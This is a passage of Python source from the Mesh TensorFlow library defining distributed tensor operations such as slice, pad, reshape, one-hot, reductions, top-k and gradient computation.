dim.\n\n Args:\n x: a Tensor\n offset: an integer. If negative, shift left instead of right.\n dim: a Dimension of x\n wrap: a boolean - whether to wrap (True) or pad with zeros (False).\n name: an optional string\n\n Returns:\n a Tensor with the same shape and dtype as x\n \"\"\"\n return ShiftOperation(x, offset, dim, wrap, name=name).outputs[0]\n\n\nclass SliceOperation(Operation):\n \"\"\"tf.slice.\n\n We support the slice operation along one axis. 
Similar to tf.slice, specify\n the begin and size values for the slice_dim.\n \"\"\"\n\n def __init__(self, x, begin, size, slice_dim_name, name=None):\n super(SliceOperation, self).__init__([x], name=name or \"slice\")\n dim_names = x.shape.dimension_names\n self._axis = axis = dim_names.index(slice_dim_name)\n self._begin = begin\n self._slice_dim = Dimension(slice_dim_name, size)\n input_shape = self._inputs[0].shape\n output_shape = Shape(\n input_shape.dims[:axis] + [self._slice_dim] + input_shape.dims[axis+1:])\n self._outputs = [Tensor(self, output_shape, x.dtype)]\n\n def gradient(self, grad_ys):\n actual_size = self._inputs[0].shape.dims[self._axis].size\n return [\n pad(grad_ys[0],\n [self._begin, actual_size - self._slice_dim.size - self._begin],\n self._slice_dim.name)]\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n if mesh_impl.tensor_dimension_to_mesh_axis(self._slice_dim) is not None:\n raise ValueError(\"can't slice along split axis\")\n inputs = self._inputs[0]\n ndims = self._inputs[0].shape.ndims\n axis = self._axis\n begin = [0] * axis + [self._begin] + [0] * (ndims - axis - 1)\n size = [-1] * axis + [self._slice_dim.size] + [-1] * (ndims - axis - 1)\n\n def slicewise_fn(x, begin, size):\n return tf.slice(x, begin, size, name=\"slice\")\n y = mesh_impl.slicewise(\n slicewise_fn, lowering.tensors[inputs], begin, size)\n lowering.set_tensor_lowering(self.outputs[0], y)\n\n\nclass PadOperation(Operation):\n \"\"\"tf.pad.\n\n Similar to tf.pad but we only pad along one axis given by pad_dim_name\n with values specified by paddings. paddings is a list of two\n values, giving the padding value before and after pad_dim.\n \"\"\"\n\n def __init__(self, x, paddings, pad_dim_name, name=None):\n super(PadOperation, self).__init__([x], name=name or \"pad\")\n assert len(paddings) == 2\n input_shape = self._inputs[0].shape\n dim_names = [dim.name for dim in x.shape.dims]\n if pad_dim_name not in dim_names:\n raise ValueError(\"Padding dim name %s not found in input.\" % pad_dim_name)\n self._paddings = paddings\n self._axis = axis = dim_names.index(pad_dim_name)\n output_size = input_shape.dims[axis].size + sum(paddings)\n self._output_dim = Dimension(pad_dim_name, output_size)\n output_shape = Shape(\n input_shape.dims[:axis] +\n [self._output_dim] + input_shape.dims[axis+1:])\n self._outputs = [Tensor(self, output_shape, x.dtype)]\n\n def gradient(self, grad_ys):\n slice_dim_name = self._output_dim.name\n slice_size = self._inputs[0].shape.dims[self._axis].size\n return [slice(grad_ys[0], self._paddings[0], slice_size, slice_dim_name)]\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n if mesh_impl.tensor_dimension_to_mesh_axis(self._output_dim) is not None:\n raise ValueError(\"can't pad along split axis\")\n inputs = self._inputs[0]\n ndims = self._inputs[0].shape.ndims\n axis = self._axis\n paddings = [[0, 0]] * axis + [self._paddings] + [[0, 0]]* (ndims - axis - 1)\n\n def slicewise_fn(x, paddings):\n return tf.pad(x, paddings, name=\"pad\")\n y = mesh_impl.slicewise(\n slicewise_fn, lowering.tensors[inputs], paddings)\n lowering.set_tensor_lowering(self.outputs[0], y)\n\n\nclass OneHotOperation(Operation):\n \"\"\"one_hot.\n \"\"\"\n\n def __init__(self, indices, output_dim, on_value, off_value, dtype,\n name=None):\n super(OneHotOperation, self).__init__([indices], name=name or \"one_hot\")\n if not indices.dtype.is_integer:\n raise ValueError(\"indices requires an integer dtype got %s\" % indices)\n self._output_dim = 
output_dim\n self._on_value = on_value\n self._off_value = off_value\n self._dtype = dtype\n output_shape = Shape(indices.shape.dims + [output_dim])\n self._outputs = [Tensor(self, output_shape, dtype)]\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n indices = self.inputs[0]\n output_shape = self.outputs[0].shape\n output_slice_shape = mesh_impl.slice_shape(output_shape)\n mesh_axis = mesh_impl.tensor_dimension_to_mesh_axis(self._output_dim)\n depth = output_slice_shape[-1]\n if mesh_axis is None:\n offset = 0\n else:\n offset = mesh_impl.slicewise(\n tf.multiply, mesh_impl.laid_out_pcoord(mesh_axis), depth)\n\n def slicewise_fn(indices_slice, offset):\n return tf.one_hot(indices_slice - offset,\n depth,\n on_value=tf.cast(self._on_value, self._dtype),\n off_value=tf.cast(self._off_value, self._dtype),\n dtype=self._dtype)\n y = mesh_impl.slicewise(\n slicewise_fn, lowering.tensors[indices], offset)\n lowering.set_tensor_lowering(self.outputs[0], y)\n\n\nclass ImportOperation(Operation):\n \"\"\"Import a tf.Tensor onto a mesh.\"\"\"\n\n def __init__(self, mesh, tf_tensor, shape, name=None):\n super(ImportOperation, self).__init__([], mesh=mesh, name=name or \"import\")\n self._outputs = [Tensor(self, shape, tf_tensor.dtype)]\n self._tf_tensor = tf_tensor\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n lowering.set_tensor_lowering(\n self.outputs[0],\n mesh_impl.import_tf_tensor(self.outputs[0], self._tf_tensor))\n\n\ndef anonymous_shape(shape):\n shape = convert_to_shape(shape)\n return Shape([Dimension(\"_anonymous_%i\" % i, d.size)\n for i, d in enumerate(shape)])\n\n\ndef anonymize(x):\n return reshape(x, anonymous_shape(x.shape))\n\n\ndef import_tf_tensor(mesh, tf_tensor, shape=None, name=None):\n tf_tensor = tf.convert_to_tensor(tf_tensor)\n if shape is None:\n shape = Shape([])\n assert not tf_tensor.shape.as_list()\n return ImportOperation(\n mesh, tf_tensor, convert_to_shape(shape), name=name).outputs[0]\n\n\ndef import_fully_replicated(mesh, tf_tensor, shape, name=None):\n return reshape(import_tf_tensor(\n mesh, tf_tensor, anonymous_shape(shape), name), shape)\n\n\nclass Variable(Operation):\n \"\"\"Variable.\"\"\"\n\n def __init__(self, mesh, name, shape, dtype, initializer,\n trainable, **kwargs):\n super(Variable, self).__init__([], mesh, name=\"name_will_be_set_later\")\n self._trainable = trainable\n with tf.device(\"cpu:0\"), mtf_utils.outside_all_rewrites():\n self.master = tf.get_variable(\n name, shape.to_integer_list, dtype=dtype, initializer=initializer,\n **kwargs)\n self._name = self.master.name[:self.master.name.find(\":\")]\n self._outputs = [Tensor(self, shape, dtype)]\n self.graph.all_variables.append(self)\n if trainable:\n self.graph.trainable_variables.append(self)\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n with mtf_utils.outside_all_rewrites():\n sv = mesh_impl.LaidOutVariable(self, mesh_impl)\n lowering.variables[self] = sv\n lowering.set_tensor_lowering(self.outputs[0], sv.laid_out_tensor)\n if self._trainable:\n lowering.add_counter(\"variables/trainable\", self.outputs[0].size)\n else:\n lowering.add_counter(\"variables/untrainable\", self.outputs[0].size)\n\n @property\n def value(self):\n return self.outputs[0]\n\n @property\n def shape(self):\n return self.value.shape\n\n @property\n def dtype(self):\n return self.value.dtype\n\n\ndef get_variable(mesh, name, shape, dtype=tf.float32,\n initializer=None, trainable=True,\n activation_dtype=None, **kwargs):\n ret = Variable(\n 
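# the master copy of the variable is created on cpu:0 in Variable.__init__;\n # it is split into per-processor slices only when the graph is lowered\n 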
mesh, name, convert_to_shape(shape), dtype, initializer,\n trainable, **kwargs).outputs[0]\n if activation_dtype and activation_dtype != dtype:\n ret = cast(ret, activation_dtype)\n return ret\n\n\nclass Assign(Operation):\n \"\"\"Assign to a variable.\"\"\"\n\n def __init__(self, var, new_val, name=None):\n super(Assign, self).__init__([new_val], var.mesh, name=name or \"assign\")\n self._var = var\n self._outputs = []\n\n def lower(self, lowering):\n lowering.operations[self] = lowering.variables[self._var].assign_to_slices(\n lowering.tensors[self.inputs[0]].to_laid_out_tensor().all_slices)\n\n\ndef assign(var, new_val):\n \"\"\"Assign a new value to a variable.\n\n Args:\n var: either a Variable operation or its output Tensor.\n new_val: a Tensor\n Returns:\n an Operation\n Raises:\n ValueError: if var is not a Variable and var.operation is not a Variable\n \"\"\"\n if isinstance(var, Tensor):\n var = var.operation\n if not isinstance(var, Variable):\n raise ValueError(\"var must be a mtf.Variable or its output Tensor.\")\n return Assign(var, new_val)\n\n\nclass Depend(Operation):\n \"\"\"Control dependency.\"\"\"\n\n def __init__(self, x, dependencies, name=None):\n super(Depend, self).__init__([x], x.mesh, name=name or \"depend\")\n for d in dependencies:\n if not isinstance(d, Operation):\n raise ValueError(\"dependencies must be mtf.Operations. got %s\" % d)\n self._dependencies = dependencies\n self._outputs = [Tensor(self, x.shape, x.dtype)]\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n if not mesh_impl.supports_control_dependencies:\n raise ValueError(\"Mesh does not support control dependencies.\")\n with tf.control_dependencies(\n [lowering.operations[d] for d in self._dependencies]):\n lowering.set_tensor_lowering(\n self.outputs[0],\n mesh_impl.slicewise(tf.identity,\n lowering.tensors[self.inputs[0]]))\n\n def gradient(self, grad_ys):\n return grad_ys\n\n\ndef depend(x, dependencies):\n \"\"\"Identity of Tensor x that depends on operations dependencies.\n\n Args:\n x: a Tensor\n dependencies: a list of Operations\n Returns:\n a Tensor\n \"\"\"\n return Depend(x, dependencies).outputs[0]\n\n\nclass Constant(Operation):\n \"\"\"A tensor where every element is the same constant value.\"\"\"\n\n def __init__(self, mesh, value, shape, dtype, name=None):\n super(Constant, self).__init__([], mesh, name=name or \"constant\")\n self._outputs = [Tensor(self, shape, dtype)]\n self._value = value\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n slice_shape = mesh_impl.slice_shape(self.outputs[0].shape)\n def tf_fn():\n return tf.constant(value=self._value,\n dtype=self.outputs[0].dtype,\n shape=slice_shape)\n lowering.set_tensor_lowering(self.outputs[0], mesh_impl.slicewise(tf_fn))\n\n\ndef constant(mesh, value, shape=None, dtype=tf.float32):\n shape = convert_to_shape(shape)\n return Constant(mesh, value,\n shape if shape is not None else Shape([]),\n dtype).outputs[0]\n\n\ndef zeros(mesh, shape, dtype=tf.float32):\n return constant(mesh, 0, shape=convert_to_shape(shape), dtype=dtype)\n\n\ndef zeros_like(t):\n return zeros(t.mesh, t.shape, dtype=t.dtype)\n\n\nclass StopGradient(Operation):\n \"\"\"Similar to tf.stop_gradient.\"\"\"\n\n def __init__(self, x, name=None):\n super(StopGradient, self).__init__(\n [x], x.mesh, name=name or \"stop_gradient\")\n self._outputs = [Tensor(self, x.shape, x.dtype)]\n\n def lower(self, lowering):\n lowering.set_tensor_lowering(self.outputs[0],\n lowering.tensors[self.inputs[0]])\n\n @property\n 
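# overriding has_gradient so that gradients() skips this op during backprop\n 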
def has_gradient(self):\n return False\n\n\ndef stop_gradient(x):\n return StopGradient(x).outputs[0]\n\n\nclass PrintOperation(Operation):\n \"\"\"Similar to tf.Print.\"\"\"\n\n def __init__(self, x, data, message, name=None, **kwargs):\n super(PrintOperation, self).__init__(\n [x], x.mesh, name=name or \"Print\")\n self._outputs = [Tensor(self, x.shape, x.dtype)]\n self._data = data\n self._message = message\n self._kwargs = kwargs\n\n def lower(self, lowering):\n lowering.set_tensor_lowering(\n self.outputs[0],\n lowering.mesh_impl(self).Print(\n lowering.tensors[self.inputs[0]],\n [lowering.tensors[d].to_laid_out_tensor() for d in self._data],\n self._message, **self._kwargs))\n\n def gradient(self, grad_ys):\n return grad_ys\n\n\ndef Print(x, data, message, **kwargs): # pylint: disable=invalid-name\n \"\"\"Call tf.Print.\n\n Args:\n x: a Tensor.\n data: a list of Tensor\n message: a string\n **kwargs: keyword arguments to tf.Print\n Returns:\n a Tensor which is identical in value to x\n \"\"\"\n return PrintOperation(x, data, message, **kwargs).outputs[0]\n\n\nclass ReshapeOperation(Operation):\n \"\"\"Similar to tf.reshape.\"\"\"\n\n def __init__(self, x, new_shape, name=None):\n super(ReshapeOperation, self).__init__([x], x.mesh, name=name or \"reshape\")\n self._outputs = [Tensor(self, new_shape, x.dtype)]\n\n def lower(self, lowering):\n \"\"\"Lower the ReshapeOperation.\n\n Reshaping can require collective communication between processors.\n We haven't yet implemented all possible reshapes. We try to handle the\n common cases here - otherwise we raise a NotImplementedError.\n\n Args:\n lowering: a Lowering\n Raises:\n NotImplementedError: if we haven't covered this case\n \"\"\"\n old_shape = self.inputs[0].shape\n new_shape = self.outputs[0].shape\n mesh_impl = lowering.mesh_impl(self)\n slices = lowering.tensors[self.inputs[0]]\n\n mesh_axis_to_cumprod_old = mesh_impl.mesh_axis_to_cumprod(old_shape)\n mesh_axis_to_cumprod_new = mesh_impl.mesh_axis_to_cumprod(new_shape)\n # Figure out what needs to be done for different mesh-axes\n mesh_axes_allsplit = []\n mesh_axes_allconcat = []\n mesh_axes_alltoall = []\n for mesh_axis, (old_cumprod, new_cumprod) in enumerate(\n zip(mesh_axis_to_cumprod_old, mesh_axis_to_cumprod_new)):\n if new_cumprod != old_cumprod:\n if old_cumprod is None:\n # split in new layout but not in old layout - we need an allsplit\n mesh_axes_allsplit.append(mesh_axis)\n elif new_cumprod is None:\n # split in old layout but not in new layout - we need an allconcat\n mesh_axes_allconcat.append(mesh_axis)\n else:\n # split differently in old and new layouts - we need an alltoall\n mesh_axes_alltoall.append(mesh_axis)\n\n laid_out_size = mesh_impl.laid_out_size(old_shape)\n\n for mesh_axis in mesh_axes_allsplit:\n tensor_axis = old_shape.cumprod_to_tensor_axis(\n mesh_axis_to_cumprod_new[mesh_axis])\n if tensor_axis is None:\n # TODO(noam): try to handle this case\n raise NotImplementedError(\n \"Try first reshaping to insert a new tf dimension,\"\n \" then changing layout.\")\n slices = mesh_impl.allsplit(slices, mesh_axis, tensor_axis)\n laid_out_size //= mesh_impl.shape[mesh_axis].size\n for mesh_axis in mesh_axes_alltoall:\n split_tensor_axis = old_shape.cumprod_to_tensor_axis(\n mesh_axis_to_cumprod_new[mesh_axis])\n if split_tensor_axis is None:\n # TODO(noam): try to handle this case\n raise NotImplementedError(\n \"Try first reshaping to insert a new tf dimension,\"\n \" then changing layout.\")\n concat_tensor_axis = 
old_shape.cumprod_to_tensor_axis(\n mesh_axis_to_cumprod_old[mesh_axis])\n assert concat_tensor_axis is not None\n slices = mesh_impl.alltoall(\n slices, mesh_axis, split_tensor_axis, concat_tensor_axis)\n lowering.add_counter(\n \"alltoall/%s/reshape_op\" % mesh_axis, laid_out_size)\n\n for mesh_axis in mesh_axes_allconcat:\n tensor_axis = old_shape.cumprod_to_tensor_axis(\n mesh_axis_to_cumprod_old[mesh_axis])\n assert tensor_axis is not None\n slices = mesh_impl.allconcat(slices, mesh_axis, tensor_axis)\n laid_out_size *= mesh_impl.shape[mesh_axis].size\n lowering.add_counter(\n \"allconcat/%s/reshape_op\" % mesh_axis, laid_out_size)\n # now reshape the slices\n old_slice_shape = mesh_impl.slice_shape(old_shape)\n new_slice_shape = mesh_impl.slice_shape(new_shape)\n if new_slice_shape != old_slice_shape:\n def reshape_fn(x):\n return tf.reshape(x, new_slice_shape)\n slices = mesh_impl.slicewise(reshape_fn, slices)\n lowering.set_tensor_lowering(self.outputs[0], slices)\n\n def gradient(self, grad_ys):\n return [reshape(grad_ys[0], self.inputs[0].shape)]\n\n\ndef reshape(x, new_shape):\n return ReshapeOperation(x, convert_to_shape(new_shape)).outputs[0]\n\n\ndef rename_dimension(x, old_name, new_name):\n \"\"\"Reshape a Tensor, renaming one dimension.\n\n Args:\n x: a Tensor\n old_name: a string\n new_name: a string\n\n Returns:\n a Tensor\n \"\"\"\n return reshape(x, x.shape.rename_dimension(old_name, new_name))\n\n\ndef einsum(xs, output_shape=None, name=None):\n \"\"\"Einstein summation.\n\n If output_shape is not specified and there are two inputs, reduce over\n all common dimensions and default the output shape to the unique dimensions\n of the first input followed by the unique dimensions of the second input.\n\n Args:\n xs: a list of Tensors\n output_shape: an optional Shape.\n name: an optional string\n Returns:\n a Tensor\n Raises:\n ValueError: if the output shape cannot be inferred\n \"\"\"\n output_shape = convert_to_shape(output_shape)\n if output_shape is None:\n if len(xs) == 2:\n output_shape = Shape(\n [d for d in xs[0].shape.dims if d not in xs[1].shape.dims] +\n [d for d in xs[1].shape.dims if d not in xs[0].shape.dims])\n else:\n raise ValueError(\"could not infer einsum output_shape for inputs %s\" %\n [x.to_string for x in xs])\n return EinsumOperation(xs, output_shape, name=name).outputs[0]\n\n\ndef matmul(a, b, output_shape=None, name=None):\n return einsum([a, b], output_shape=output_shape, name=name)\n\n\ndef _reduction_output_shape(x, output_shape, reduced_dim):\n \"\"\"Helper function to reduce_sum, etc.\"\"\"\n if output_shape is None:\n if reduced_dim is None:\n return Shape([])\n else:\n if reduced_dim not in x.shape.dims:\n raise ValueError(\n \"reduced_dim=%s not in x.shape.dims=%s\" % (reduced_dim, x.shape))\n return x.shape - reduced_dim\n elif reduced_dim is not None:\n raise ValueError(\"do not specify both reduced_dim and output_shape\")\n else:\n return output_shape\n\n\ndef reduce_sum(x,\n disable_positional_args=None,\n output_shape=None,\n reduced_dim=None,\n name=None):\n \"\"\"Reduction on 1 or more axes.\n\n If reduced_dim is present, then only that dimension is reduced out.\n Alternatively, specify output_shape.\n Do not specify both reduced_dim and output_shape.\n If neither is specified, then all dimensions are reduced out.\n\n Args:\n x: a Tensor\n disable_positional_args: None\n output_shape: an optional Shape. 
Must be a subsequence of x.shape.\n reduced_dim: a mtf.Dimension\n name: an optional string\n Returns:\n a Tensor\n \"\"\"\n output_shape = convert_to_shape(output_shape)\n reduced_dim = convert_to_dimension(reduced_dim)\n assert disable_positional_args is None\n output_shape = _reduction_output_shape(x, output_shape, reduced_dim)\n if output_shape == x.shape:\n return x\n return ReduceOperation(x, output_shape, \"SUM\", name=name).outputs[0]\n\n\ndef reduce_mean(x,\n disable_positional_args=None,\n output_shape=None,\n reduced_dim=None,\n name=None):\n \"\"\"Reduction on 1 or more axes.\n\n If reduced_dim is present, then only that dimension is reduced out.\n Alternatively, specify output_shape.\n Do not specify both reduced_dim and output_shape.\n If neither is specified, then all dimensions are reduced out.\n\n Args:\n x: a Tensor\n disable_positional_args: None\n output_shape: an optional Shape. Must be a subsequence of x.shape.\n reduced_dim: a mtf.Dimension\n name: an optional string\n\n Returns:\n a Tensor\n \"\"\"\n output_shape = convert_to_shape(output_shape)\n reduced_dim = convert_to_dimension(reduced_dim)\n assert disable_positional_args is None\n output_shape = _reduction_output_shape(x, output_shape, reduced_dim)\n with tf.variable_scope(name, default_name=\"reduce_mean\"):\n if output_shape == x.shape:\n return x\n return reduce_sum(\n x, output_shape=output_shape) * (output_shape.size / x.shape.size)\n\n\ndef reduce_max(x,\n disable_positional_args=None,\n output_shape=None,\n reduced_dim=None,\n name=None):\n \"\"\"Reduction on 1 or more axes.\n\n Args:\n x: a Tensor\n disable_positional_args: None\n output_shape: an optional Shape. Must be a subsequence of x.shape.\n reduced_dim: an optional Dimension\n name: an optional string\n Returns:\n a Tensor\n \"\"\"\n output_shape = convert_to_shape(output_shape)\n reduced_dim = convert_to_dimension(reduced_dim)\n assert disable_positional_args is None\n output_shape = _reduction_output_shape(x, output_shape, reduced_dim)\n if output_shape is None:\n output_shape = Shape([])\n if output_shape == x.shape:\n return x\n return ReduceOperation(\n x, output_shape, \"MAX\", name=name or \"reduce_max\").outputs[0]\n\n\ndef reduce_min(x,\n disable_positional_args=None,\n output_shape=None,\n reduced_dim=None,\n name=None):\n \"\"\"Reduction on 1 or more axes.\n\n Args:\n x: a Tensor\n disable_positional_args: None\n output_shape: an optional Shape. 
Must be a subsequence of x.shape.\n reduced_dim: an optional Dimension\n name: an optional string\n Returns:\n a Tensor\n \"\"\"\n output_shape = convert_to_shape(output_shape)\n reduced_dim = convert_to_dimension(reduced_dim)\n assert disable_positional_args is None\n output_shape = _reduction_output_shape(x, output_shape, reduced_dim)\n if output_shape is None:\n output_shape = Shape([])\n if output_shape == x.shape:\n return x\n return ReduceOperation(\n x, output_shape, \"MIN\", name=name or \"reduce_min\").outputs[0]\n\n\ndef reduce_all(x,\n disable_positional_args=None,\n output_shape=None,\n reduced_dim=None,\n name=None):\n output_shape = convert_to_shape(output_shape)\n reduced_dim = convert_to_dimension(reduced_dim)\n return cast(reduce_min(to_float(x),\n disable_positional_args=disable_positional_args,\n output_shape=output_shape,\n reduced_dim=reduced_dim,\n name=name or \"reduce_all\"), tf.bool)\n\n\ndef reduce_any(x,\n disable_positional_args=None,\n output_shape=None,\n reduced_dim=None,\n name=None):\n output_shape = convert_to_shape(output_shape)\n reduced_dim = convert_to_dimension(reduced_dim)\n return cast(reduce_max(to_float(x),\n disable_positional_args=disable_positional_args,\n output_shape=output_shape,\n reduced_dim=reduced_dim,\n name=name or \"reduce_any\"), tf.bool)\n\n\ndef top_1(x, reduced_dim, dtype=tf.int32, name=None):\n \"\"\"Argmax and Max.\n\n Args:\n x: a Tensor\n reduced_dim: a Dimension in x.shape.dims\n dtype: a tf.dtype (for the output)\n name: an optional string\n Returns:\n indices: a Tensor with given dtype\n values: optional Tensor equal to mtf.reduce_max(x, reduced_dim=reduced_dim)\n \"\"\"\n reduced_dim = convert_to_dimension(reduced_dim)\n with tf.name_scope(name, default_name=\"top_1\"):\n max_val = reduce_max(x, reduced_dim=reduced_dim)\n is_max = to_float(equal(x, max_val))\n pos = range(x.mesh, reduced_dim, tf.float32)\n ret = reduce_max(is_max * pos, reduced_dim=reduced_dim)\n ret = cast(ret, dtype)\n return ret, max_val\n\n\ndef argmax(x, reduced_dim, dtype=tf.int32, name=None):\n reduced_dim = convert_to_dimension(reduced_dim)\n return top_1(x, reduced_dim, dtype, name)[0]\n\n\ndef top_k(x, reduced_dim, new_dim, dtype=tf.int32, name=None):\n \"\"\"Like tf.top_k.\n\n This operation returns two tensors with the same shape. The output shape\n is identical to the shape of x, except that reduced_dim is replaced by\n new_dim.\n\n Args:\n x: a Tensor\n reduced_dim: a Dimension in x.shape.dims.\n new_dim: a Dimension. 
The size determines k.\n dtype: optional dtype for indices.\n name: optional string.\n Returns:\n indices: a Tensor with given dtype.\n values: a Tensor with same type as x.\n \"\"\"\n reduced_dim = convert_to_dimension(reduced_dim)\n new_dim = convert_to_dimension(new_dim)\n indices = []\n values = []\n k = new_dim.size\n with tf.name_scope(name, default_name=\"top_k\"):\n for i in xrange(k):\n max_index, max_val = top_1(x, reduced_dim, dtype)\n indices.append(max_index)\n values.append(max_val)\n if i + 1 < k:\n x += one_hot(max_index, reduced_dim, on_value=-1e9)\n axis = x.shape.dims.index(reduced_dim)\n return stack(indices, new_dim.name, axis), stack(values, new_dim.name, axis)\n\n\ndef sample_with_temperature(x, dim, temperature=1.0, dtype=tf.int32, name=None):\n dim = convert_to_dimension(dim)\n with tf.name_scope(name, default_name=\"sample_with_temperature\"):\n if temperature != 0.0:\n # gumbel trick\n g = -log(-log(random_uniform(x.mesh, x.shape, dtype=x.dtype)))\n x += g * temperature\n return argmax(x, dim, dtype, name)\n\n\ndef add(x1, x2, output_shape=None, name=None):\n \"\"\"Binary addition with broadcasting.\n\n Args:\n x1: a Tensor\n x2: a Tensor\n output_shape: an optional Shape\n name: an optional string\n Returns:\n a Tensor\n \"\"\"\n output_shape = convert_to_shape(output_shape)\n if not isinstance(x2, Tensor):\n return ScalarAddOperation(x1, x2).outputs[0]\n with tf.name_scope(name, default_name=\"add\"):\n x1, x2 = binary_arguments_to_tensors(x1, x2)\n return AddOperation(\n x1, x2, output_shape=_infer_binary_broadcast_shape(\n x1.shape, x2.shape, output_shape)).outputs[0]\n\n\ndef sub(x1, x2, output_shape=None, name=None):\n \"\"\"Binary subtraction with broadcasting.\n\n Args:\n x1: a Tensor\n x2: a Tensor\n output_shape: an optional Shape\n name: an optional string\n Returns:\n a Tensor\n \"\"\"\n output_shape = convert_to_shape(output_shape)\n if not isinstance(x2, Tensor):\n return ScalarAddOperation(x1, -x2).outputs[0]\n with tf.name_scope(name, default_name=\"sub\"):\n x1, x2 = binary_arguments_to_tensors(x1, x2)\n return add(x1, negative(x2), output_shape=output_shape)\n\n\ndef multiply(x1, x2, output_shape=None, name=None):\n \"\"\"Binary multiplication with broadcasting.\n\n Args:\n x1: a Tensor\n x2: a Tensor\n output_shape: an optional Shape\n name: an optional string\n Returns:\n a Tensor\n \"\"\"\n if not isinstance(x2, Tensor):\n return ScalarMultiplyOperation(x1, x2).outputs[0]\n with tf.name_scope(name, default_name=\"mul\"):\n x1, x2 = binary_arguments_to_tensors(x1, x2)\n return einsum(\n [x1, x2],\n output_shape=_infer_binary_broadcast_shape(\n x1.shape, x2.shape, output_shape))\n\n\ndef divide(x1, x2, output_shape=None, name=None):\n \"\"\"Binary division with broadcasting.\n\n Args:\n x1: a Tensor\n x2: a Tensor\n output_shape: an optional Shape\n name: an optional string\n Returns:\n a Tensor\n \"\"\"\n output_shape = convert_to_shape(output_shape)\n if not isinstance(x2, Tensor):\n return ScalarMultiplyOperation(x1, 1.0 / x2).outputs[0]\n with tf.name_scope(name, default_name=\"divide\"):\n x1, x2 = binary_arguments_to_tensors(x1, x2)\n return multiply(x1, reciprocal(x2), output_shape=output_shape)\n\n\ndef slice(x, begin, size, slice_dim_name, name=None): # pylint: disable=redefined-builtin\n \"\"\"Slice operation.\n\n Args:\n x: a Tensor\n begin: integer, where to begin slicing from along the axis\n size: integer, size to slice from axis.\n slice_dim_name: string, dimension name of slicing axis.\n name: an optional string\n 
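\n Example (with a hypothetical dimension named \"length\"):\n y = slice(x, begin=2, size=3, slice_dim_name=\"length\")\n\n 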
Returns:\n a Tensor with the same shape as x, except that the sliced dimension\n now has the given size.\n \"\"\"\n return SliceOperation(\n x, begin, size, slice_dim_name, name=name).outputs[0]\n\n\ndef pad(x, paddings, dim_name, name=None):\n \"\"\"Pad operation.\n\n Args:\n x: a Tensor\n paddings: list of integers of size 2, padding size before and after for dim.\n dim_name: string, name for the padding dim\n name: an optional string\n Returns:\n a Tensor with the same shape as x, except that dim_name is extended by\n the total padding.\n \"\"\"\n return PadOperation(\n x, paddings, dim_name, name=name).outputs[0]\n\n\ndef one_hot(indices, output_dim, on_value=1.0,\n off_value=0.0, dtype=tf.float32, name=None):\n \"\"\"One hot operation.\n\n Args:\n indices: a Tensor\n output_dim: a Dimension\n on_value: Value taken when indices are on at a location, default 1\n off_value: Value taken when indices are off at a location, default 0\n dtype: a tf.DType\n name: an optional string\n Returns:\n a Tensor with shape extended by output_dim for the last axis.\n \"\"\"\n return OneHotOperation(\n indices, output_dim, on_value, off_value, dtype, name=name).outputs[0]\n\n\ndef gather(weights, indices, dim, output_shape=None):\n \"\"\"Shorthand for einsum([one_hot(indices, dim), weights]).\n\n Args:\n weights: a Tensor\n indices: a Tensor with integer type\n dim: a Dimension\n output_shape: an optional mtf.Shape\n Returns:\n a Tensor\n \"\"\"\n dim = convert_to_dimension(dim)\n output_shape = convert_to_shape(output_shape)\n if weights.dtype == tf.bool:\n return cast(gather(to_float(weights), indices, dim, output_shape), tf.bool)\n return einsum([one_hot(indices, dim, dtype=weights.dtype), weights],\n output_shape=output_shape)\n\n\ndef gradients(ys, xs, grad_ys=None):\n \"\"\"Compute gradients in mtf.\n\n Args:\n ys: a list of Tensors\n xs: a list of Tensors\n grad_ys: an optional list of Tensors\n\n Returns:\n grad_xs: a list of Tensors\n \"\"\"\n graph = ys[0].graph\n if not grad_ys:\n grad_ys = [Constant(y.mesh, 1.0, y.shape, y.dtype).outputs[0] for y in ys]\n # figure out what Tensors are downstream of xs\n downstream = set(xs)\n for op in graph.operations:\n if op.has_gradient:\n if set(op.inputs) & downstream:\n downstream |= set(op.outputs)\n tensor_to_gradient = dict(zip(ys, grad_ys))\n for op in graph.operations[::-1]:\n grad_outputs = [tensor_to_gradient.get(out) for out in op.outputs]\n if op.has_gradient and any(grad_outputs) and (set(op.inputs) & downstream):\n with tf.variable_scope(op.name + \"/gradients\"):\n input_grads = op.gradient(grad_outputs)\n for inp, grad in zip(op.inputs, input_grads):\n if inp in downstream and grad is not None:\n if inp in tensor_to_gradient:\n tensor_to_gradient[inp] += grad\n else:\n tensor_to_gradient[inp] = grad\n return [tensor_to_gradient.get(x, None) for x in xs]\n\n\ndef _infer_binary_broadcast_shape(shape1, shape2, given_output_shape=None):\n \"\"\"Infer shape of the output of a binary op with broadcasting.\n\n If the output shape is not given with given_output_shape, then we check\n to see if one of the shapes is a subsequence of the other one, and we\n return the one that is the supersequence. 
Otherwise, we list the dimensions\n  of shape1, followed by all new dimensions in shape2.\n\n  Args:\n    shape1: a Shape\n    shape2: a Shape\n    given_output_shape: an optional Shape\n  Returns:\n    a Shape\n  \"\"\"\n  shape1 = convert_to_shape(shape1)\n  shape2 = convert_to_shape(shape2)\n  given_output_shape = convert_to_shape(given_output_shape)\n  if given_output_shape is not None:\n    return given_output_shape\n  if is_subsequence(shape1.dims, shape2.dims):\n    return shape2\n  if is_subsequence(shape2.dims, shape1.dims):\n    return shape1\n  return Shape(\n      shape1.dims + [d for d in shape2.dims if d not in shape1.dims])\n\n\ndef _expand_dims(x, input_shape, output_shape):\n  \"\"\"Expand dimensions and transpose if necessary.\n\n  Args:\n    x: a tf.Tensor\n    input_shape: a Shape\n    output_shape: a Shape whose dimensions are a superset of\n      those in input_shape\n\n  Returns:\n    a tf.Tensor\n  \"\"\"\n  verify_no_new_dims([output_shape], input_shape)\n  if input_shape == output_shape or input_shape.ndims == 0:\n    return x\n  perm = [input_shape.dims.index(d) for d in output_shape.dims\n          if d in input_shape.dims]\n  x = tf.transpose(x, perm)\n  for i, d in enumerate(output_shape.dims):\n    if d not in input_shape.dims:\n      x = tf.expand_dims(x, i)\n  return x\n\n\ndef _einsum_equation(input_shapes, output_shape):\n  \"\"\"Turn shapes into an einsum equation.\n\n  